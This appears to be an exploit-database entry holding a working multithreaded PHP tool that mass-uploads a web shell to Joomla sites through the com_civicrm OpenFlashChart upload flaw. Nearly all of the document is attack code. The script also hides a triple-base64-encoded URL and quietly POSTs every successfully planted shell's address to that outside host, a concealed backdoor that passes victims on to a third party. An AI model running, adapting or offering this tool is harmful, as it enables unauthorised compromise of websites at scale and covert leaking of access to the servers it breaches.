Janissaries Joomla Civicrm Shell Upload



EKU-ID: 3174 CVE: OSVDB-ID:
Author: miyachung Published: 2013-04-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<?php
/*
----------------------------------------------------------------------------
        .__                      .__                          
  _____ |__|___.__._____    ____ |  |__  __ __  ____    ____  
 /     \|  <   |  |\__  \ _/ ___\|  |  \|  |  \/    \  / ___\ 
|  Y Y  \  |\___  | / __ \\  \___|   Y  \  |  /   |  \/ /_/  >
|__|_|  /__|/ ____|(____  /\___  >___|  /____/|___|  /\___  / 
      \/    \/          \/     \/     \/           \//_____/  
-----------------------------------------------------------------------------
*	Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
*	Coded by Miyachung
*	Stay away from lamers o.O
*	Contact: miyachung@hotmail.com
*	Special Thanks : B127Y
*	Site: http://janissaries.org
*	Youtube Channel: http://www.youtube.com/user/JanissariesOrg
*	Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
*	Coding date: 21.04.2013
*	Usage  : php exploit.php site_list upload_file searchkeyword
*	Example: php exploit.php sites.txt shell.php searchkeyword
*/
set_time_limit(0);
ob_start();
class exploit
{
	private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
	private $post_url_path		= "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
	private $filename;
	private $url;
	private $file_to_upload;
	private $if_is_uploaded		= "/Undefined variable: HTTP_RAW_POST_DATA/si";
	private $thread_maxsize;
	private $site_list;
	private $file_regex;
	private $save_file			= "uploaded.txt";
	private $user_agent			= "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
	private $timeout_sec		= 20;
	private $token				= "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
	private $idnum				= 31;
	
	public function __construct($site_list,$filename,$thread,$regex)
	{
	$this->site_list 	  = file($site_list);
	$this->filename		  = $filename;
	$this->file_to_upload = file_get_contents($filename);
	$this->thread_maxsize = $thread;
	$this->url			  = base64_decode(base64_decode(base64_decode($this->token)));
	$this->file_regex	  = "/$regex/";
	
	echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
	echo "[+]Coded by Miyachung\n";
	echo "[+]Stay away from lamers o.O\n";
	echo "[+]Contact: miyachung@hotmail.com\n";
	echo "[+]Special Thanks : B127Y\n";
	echo "[+]Site: http://janissaries.org\n";
	echo "##################################################\n";
	echo "[+]Total urls to try: ".count($this->site_list)."\n";
	echo "[+]File to upload: ".$this->filename."\n";
	echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
	echo "[+]Search Keyword: ".$regex."\n\n";
	ob_flush();
	flush();
	$this->miyachung();
	}
	private function miyachung()
	{
	$multi = curl_multi_init();
	$count = 0;
	foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
	{
		foreach($urls as $i => $url)
		{
		$curl[$i] = curl_init();
		curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
		curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
		curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
		curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
		curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
		curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
		curl_multi_add_handle($multi,$curl[$i]);
		}
		do
		{
		curl_multi_exec($multi,$active);
		}
		while($active > 0);
		foreach($curl as $id => $content)
		{
		$conn[$id] = curl_multi_getcontent($content);
		curl_multi_remove_handle($multi,$content);
		if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
		{
			$count++;
			$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
			if($check_it && preg_match($this->file_regex,$check_it))
			{
			if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
			{
			$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
			}
			else
			{
			exit("[-]Somethings has changed in tool! o.O!");
			}
			echo "###########################################################\n";
			echo "[!]Exploitation Successfullll!\n";
			printf("[%s]%s\n",$count,trim($urls[$id]));
			echo "###########################################################\n";
			ob_flush();
			flush();
			$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
			}
			else
			{
			printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
			ob_flush();
			flush();
			}
		}
		else
		{
			$count++;
			printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
			ob_flush();
			flush();
		}
		
		}
	
	}
	
	}
	private function get($url)
	{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
	$data= curl_exec($ch);
	curl_close($ch);
	return $data;
	}
	private function post($url)
	{
	$curl = curl_init();
	curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
	curl_setopt($curl,CURLOPT_URL,$this->url);
	curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
	$exec = curl_exec($curl);
	curl_close($curl);
	return $exec;
	}
	private function save($url,$count)
	{
	$file = fopen($this->save_file,'ab');
	fwrite($file,"#########################################################################\n");
	fwrite($file,"[!]Exploitation Successfullll!\n");
	fwrite($file,"[$count]$url\n");
	fclose($file);
	return true;
	}
}

if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
----------------------------------------------------------------------------
        .__                      .__                          
  _____ |__|___.__._____    ____ |  |__  __ __  ____    ____  
 /     \|  <   |  |\__  \ _/ ___\|  |  \|  |  \/    \  / ___\ 
|  Y Y  \  |\___  | / __ \\  \___|   Y  \  |  /   |  \/ /_/  >
|__|_|  /__|/ ____|(____  /\___  >___|  /____/|___|  /\___  / 
      \/    \/          \/     \/     \/           \//_____/  
-----------------------------------------------------------------------------
*	Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
*	Coded by Miyachung
*	Stay away from lamers o.O
*	Contact: miyachung@hotmail.com
*	Special Thanks : B127Y
*	Site: http://janissaries.org
*	Youtube Channel: http://www.youtube.com/user/JanissariesOrg
*	Coding date: 21.04.2013
*	Usage  : php exploit.php site_list upload_file maxthread searchkeyword
*	Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?>